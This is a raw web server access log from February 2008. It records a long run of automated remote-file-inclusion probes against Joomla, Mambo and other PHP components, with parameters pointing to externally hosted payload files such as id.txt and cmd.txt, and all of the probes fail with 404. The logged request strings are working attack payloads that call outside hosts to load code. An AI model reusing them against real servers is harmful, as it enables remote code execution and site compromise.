62.193.225.104 - - [17/Feb/2008:09:10:38 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
24.106.251.51 - - [17/Feb/2008:09:10:46 -0800] "GET /logs/access_071230.log/omponents/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rollarefamale.altervista.org/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:11:05 -0800] "GET /logs/access_080108.log/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:09:11:23 -0800] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:09:11:23 -0800] "GET /skin/zero_vote/error.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:09:11:23 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:09:13:19 -0800] "GET /logs/access_080120.log/skin/zero_vote/error.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.209.100.186 - - [17/Feb/2008:09:14:09 -0800] "GET /logs/access_071230.log/modules/My_eGallery/index.php?basepath=http://66.153.86.221/www??????????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.209.100.186 - - [17/Feb/2008:09:14:09 -0800] "GET /modules/My_eGallery/index.php?basepath=http://66.153.86.221/www??????????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.209.100.186 - - [17/Feb/2008:09:14:09 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://66.153.86.221/www??????????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:09:14:51 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:09:14:52 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:09:14:52 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.160.16.3 - - [17/Feb/2008:09:16:53 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [17/Feb/2008:09:16:53 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [17/Feb/2008:09:16:54 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [17/Feb/2008:09:17:29 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.19.100.165 - - [17/Feb/2008:09:18:01 -0800] "GET //surveys/survey.inc.php?path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.19.100.165 - - [17/Feb/2008:09:18:02 -0800] "GET /logs//surveys/survey.inc.php?path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:09:18:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:09:18:14 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
208.104.248.62 - - [17/Feb/2008:09:19:13 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://miznate.com/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.104.248.62 - - [17/Feb/2008:09:19:13 -0800] "GET /logs/config.inc.php?path_escape=http://miznate.com/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:20:28 -0800] "GET /index2.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:20:28 -0800] "GET /logs/index2.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.225.219.10 - - [17/Feb/2008:09:20:56 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:22:28 -0800] "GET /index.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:22:28 -0800] "GET /logs/index.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:22:48 -0800] "GET /index3.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:22:48 -0800] "GET /logs/index3.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:24:05 -0800] "GET /home.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:24:05 -0800] "GET /logs/home.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:09:24:23 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:09:24:23 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:09:24:24 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.99.250 - - [17/Feb/2008:09:26:49 -0800] "GET //auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:09:26:57 -0800] "GET /logs/access_071202.log/comments-display-tpl.php?language_file=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:09:26:58 -0800] "GET /comments-display-tpl.php?language_file=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:09:26:58 -0800] "GET /logs/comments-display-tpl.php?language_file=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:09:27:28 -0800] "GET /logs/access_071219.log/comments-display-tpl.php?language_file=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.36.253.36 - - [17/Feb/2008:09:28:42 -0800] "GET /protection.php?action=logout&siteurl=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
211.36.253.36 - - [17/Feb/2008:09:28:48 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:30:24 -0800] "GET /menu.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:30:25 -0800] "GET /logs/menu.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
212.102.0.104 - - [17/Feb/2008:09:30:50 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.marsradio.in/modules/Album/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
212.102.0.104 - - [17/Feb/2008:09:30:50 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.marsradio.in/modules/Album/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
193.34.16.201 - - [17/Feb/2008:09:32:48 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.201 - - [17/Feb/2008:09:32:48 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.201 - - [17/Feb/2008:09:32:49 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:09:33:13 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:33:36 -0800] "GET /index2.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:33:36 -0800] "GET /logs/index2.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:33:46 -0800] "GET /file.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:33:46 -0800] "GET /logs/file.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:09:35:07 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:09:35:07 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:09:35:07 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:09:36:05 -0800] "GET /logs/access_080130.log/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:09:36:06 -0800] "GET /logs/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.37.65 - - [17/Feb/2008:09:36:26 -0800] "GET /index.php?sourcedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.64.37.65 - - [17/Feb/2008:09:36:27 -0800] "GET /logs/index.php?sourcedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
193.34.16.201 - - [17/Feb/2008:09:37:34 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:09:37:52 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.108 - - [17/Feb/2008:09:38:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.89 - - [17/Feb/2008:09:39:00 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:09:39:15 -0800] "GET /logs/access_080131.log/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:09:39:16 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.191.28.10 - - [17/Feb/2008:09:39:17 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.191.28.10 - - [17/Feb/2008:09:39:19 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:39:20 -0800] "GET /index3.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:39:20 -0800] "GET /logs/index3.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:09:39:25 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:09:39:25 -0800] "GET //main.php?sayfa=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:09:39:25 -0800] "GET /logs//main.php?sayfa=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:40:08 -0800] "GET /contact.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:09:40:09 -0800] "GET /logs/contact.php?admin.php?include_path=%20guestbookhttp://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
64.191.28.10 - - [17/Feb/2008:09:40:31 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.75.5.220 - - [17/Feb/2008:09:40:48 -0800] "GET /logs/access_080122.log/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:41:34 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:41:35 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:09:41:35 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [17/Feb/2008:09:41:39 -0800] "GET /logs/access_080106.log//auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [17/Feb/2008:09:41:39 -0800] "GET /logs//auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:09:42:00 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:09:42:46 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.138.125 - - [17/Feb/2008:09:42:46 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:09:42:48 -0800] "GET //main.php?sayfa=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:09:42:51 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:09:42:51 -0800] "GET /index.php?sourcedir=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:09:42:51 -0800] "GET /logs/index.php?sourcedir=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:09:44:28 -0800] "GET /logs/access_080117.log/modules/TotalCalendar/about.php?inc_dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:09:44:28 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:09:44:29 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:09:44:29 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:09:46:02 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:09:46:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:09:46:03 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:09:46:09 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:09:46:09 -0800] "GET /index.php?sourcedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:09:46:09 -0800] "GET /logs/index.php?sourcedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:14 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:14 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:09:46:14 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
